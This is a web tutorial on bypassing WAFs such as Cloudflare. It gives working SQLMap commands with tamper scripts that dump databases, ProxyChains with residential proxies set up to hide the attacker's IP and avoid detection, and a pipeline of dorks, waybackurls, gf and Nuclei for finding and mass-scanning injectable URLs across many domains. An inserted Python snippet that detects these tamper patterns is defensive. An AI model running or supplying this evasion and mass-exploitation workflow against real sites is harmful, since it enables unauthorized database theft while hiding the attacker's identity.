WAF Bypass with SQLMap

Bypass WAFs using SQLMap + ProxyChains + tamper scripts

9 Steps
22 Commands

A Web Application Firewall monitors and filters HTTP traffic to protect applications by blocking malicious payloads like SQL injection, XSS and more.

Commands & Payloads

1. Feature: Request filtering
Request filtering - inspect and block malicious requests
2. Feature: Geo-blocking
Geo-blocking - restrict traffic by region
3. Feature: Rate limiting
Rate limiting - prevent brute force and DDoS
4. Feature: Custom rules
Custom rule creation - tailor rules for your app

Pro Tips

  • WAFs use signature-based and behavioral detection
  • Each WAF has different bypass methods
  • Always test with authorization first

Before we begin, we need: SQLMap for automating SQL injections, ProxyChains for routing through proxies, and Residential Proxies to mimic real users.

Commands & Payloads

1. Required: SQLMap
SQLMap - powerhouse for automating SQL injections
2. Required: ProxyChains
ProxyChains - routes traffic through multiple proxies
3. Required: Residential Proxies
Residential Proxies - mimic real users to avoid detection

Pro Tips

  • Install SQLMap: git clone https://github.com/sqlmapproject/sqlmap
  • ProxyChains comes pre-installed on most pentest distros
  • Residential proxies are more effective than datacenter proxies

Open the ProxyChains config file, disable local proxy, add residential proxies, and enable random chain for reliability.

Commands & Payloads

1. Open ProxyChains config file
sudo mousepad /etc/proxychains.conf
2. Disable default Tor proxy
Comment out: # socks4 127.0.0.1 9050
3. Add residential proxies
Add proxies: http <ip> <port> [user] [pass]
4. Disable dynamic chain
Disable: #dynamic_chain
5. Enable random chain for reliability
Enable: random_chain
6. Quiet mode - no library output
Add: quiet_mode

Pro Tips

  • Random chain improves reliability with multiple proxies
  • Each connection uses a random proxy from the list
  • Test with a small proxy list first to verify config

After configuration, run curl through ProxyChains to verify everything is working correctly.

Commands & Payloads

1. Check proxy chain is working
proxychains curl http://ipinfo.io
2. Verify IP is masked
proxychains curl http://ipinfo.io/ip

Pro Tips

  • The IP shown should be from your proxy list, not your real IP
  • If connection fails, check proxy format in config file
  • Test multiple times to verify random chain is working

Use SQLMap with ProxyChains and tamper scripts to bypass Cloudflare WAF and dump databases.

Commands & Payloads

1. SQLMap WAF bypass with ProxyChains and tampers
proxychains sqlmap -u 'url' --dbs --batch -p id --random-agent --tamper=between,space2comment --dbms mysql --tech=B --no-cast --flush-session --threads 10

Pro Tips

  • Tamper scripts: between, space2comment help bypass WAF rules
  • --random-agent changes User-Agent per request
  • --tech=B limits to boolean-based blind injection (quieter)
  • --no-cast avoids CAST expressions (detected by some WAFs)
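
Defender's view of the command above, as an added example that is not part of the original page: space2comment turns spaces into /**/ and between rewrites = and > comparisons as BETWEEN / NOT BETWEEN, while rotating proxies and --random-agent defeat per-IP and per-User-Agent counting, so this Python code normalizes each parameter value and groups hits by path and parameter instead. The log tuple layout, the sample records and the min_hits threshold are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample records (not real traffic): (client_ip, user_agent, path, raw_query)
SAMPLE_LOG = [
    ("198.51.100.7", "Mozilla/5.0 (X11; Linux x86_64)", "/item.php", "id=5"),
    ("203.0.113.21", "Mozilla/5.0 (Windows NT 10.0)", "/item.php",
     "id=5%2F**%2FAND%2F**%2F4821%2F**%2FBETWEEN%2F**%2F4821%2F**%2FAND%2F**%2F4821"),
    ("192.0.2.88", "Opera/9.80 (Macintosh)", "/item.php",
     "id=5/**/AND/**/4821/**/NOT/**/BETWEEN/**/0/**/AND/**/4820"),
    ("198.51.100.140", "Mozilla/4.0 (compatible; MSIE 8.0)", "/item.php",
     "id=5/**/AND/**/3/**/BETWEEN/**/3/**/AND/**/3"),
    ("192.0.2.15", "Mozilla/5.0 (iPhone)", "/search", "q=price+between+10+and+20"),
]

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
BETWEEN_BOOL = re.compile(
    r"\b(?:and|or)\s+\S+\s+(?:not\s+)?between\s+\S+\s+and\s+\S+", re.I)

def indicators(value):
    """Return the tamper-style indicators present in one decoded parameter value."""
    found = set()
    if INLINE_COMMENT.search(value):
        found.add("comment-as-whitespace")    # space2comment: ' ' -> '/**/'
    # Strip comments before matching so the rule sees what the SQL parser sees.
    normalized = " ".join(INLINE_COMMENT.sub(" ", value).split())
    if BETWEEN_BOOL.search(normalized):
        found.add("between-comparison")       # between: '=' or '>' -> BETWEEN
    return found

def detect(log, min_hits=3):
    """Group flagged requests by (path, parameter) rather than by client IP."""
    stats = defaultdict(lambda: {"hits": 0, "ips": set(), "agents": set(), "why": set()})
    for ip, agent, path, query in log:
        for name, value in parse_qsl(query, keep_blank_values=True):
            why = indicators(value)
            if not why:
                continue
            entry = stats[(path, name)]
            entry["hits"] += 1
            entry["ips"].add(ip)
            entry["agents"].add(agent)
            entry["why"] |= why
    return {key: s for key, s in stats.items() if s["hits"] >= min_hits}

if __name__ == "__main__":
    for (path, name), s in detect(SAMPLE_LOG).items():
        print(path, name, s["hits"], len(s["ips"]), len(s["agents"]), sorted(s["why"]))
```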

Scale the process by hunting SQL injection across similar subdomains using Google Dorks and passive sources.

Commands & Payloads

1. Dorking script for finding subdomains
https://github.com/coffinxp/scripts/blob/main/dorking.py
2. Extract domain names from URLs
cat urls.txt | awk -F/ '{print $3}' | sort -u
3. Get SQL param URLs from passive sources
cat urls.txt | waybackurls | gf sqli | uro > new.txt

Pro Tips

  • Use Google Dorks to find similar subdomains first
  • waybackurls fetches historical URLs from Archive.org
  • gf sqli filters URLs with SQL injection parameters

Reduce noise by getting one SQL param URL per domain to efficiently scan across a wide range of assets.

Commands & Payloads

1. One SQL param URL per domain
cat urls.txt | gawk -F/ '{host=$3; sub(/:80$/, "", host); if (!(host in seen)) { print $0; seen[host] } }'

Pro Tips

  • Testing all URLs at once is inefficient
  • This awk filter keeps the first URL seen for each host, giving one unique URL per domain
  • Great for quickly identifying vulnerable targets

Fire up Nuclei with DAST SQLi templates to scan for SQL injection vulnerabilities.

Commands & Payloads

1. Nuclei scan with DAST SQLi template
nuclei -l urls.txt -t nuclei-templates/dast/sql-injection.yaml
2. Error-based SQLi Nuclei template
https://github.com/coffinxp/nuclei-templates/blob/main/errsqli.yaml

Pro Tips

  • Nuclei can scan thousands of URLs quickly
  • DAST templates detect active vulnerabilities
  • Combine with gf and uro for cleaner results

ProxyChains and SQLMap make a powerful combo for bypassing WAFs. With residential proxies and tamper scripts, you can bypass Cloudflare, ModSecurity, and more.

Pro Tips

  • ProxyChains + residential proxies + SQLMap tampers = WAF bypass
  • Scale testing with Google Dorks + waybackurls + gf + uro
  • Use Nuclei DAST templates for mass scanning
  • Focus on finding real issues, not false alarms

For educational and authorized testing purposes only.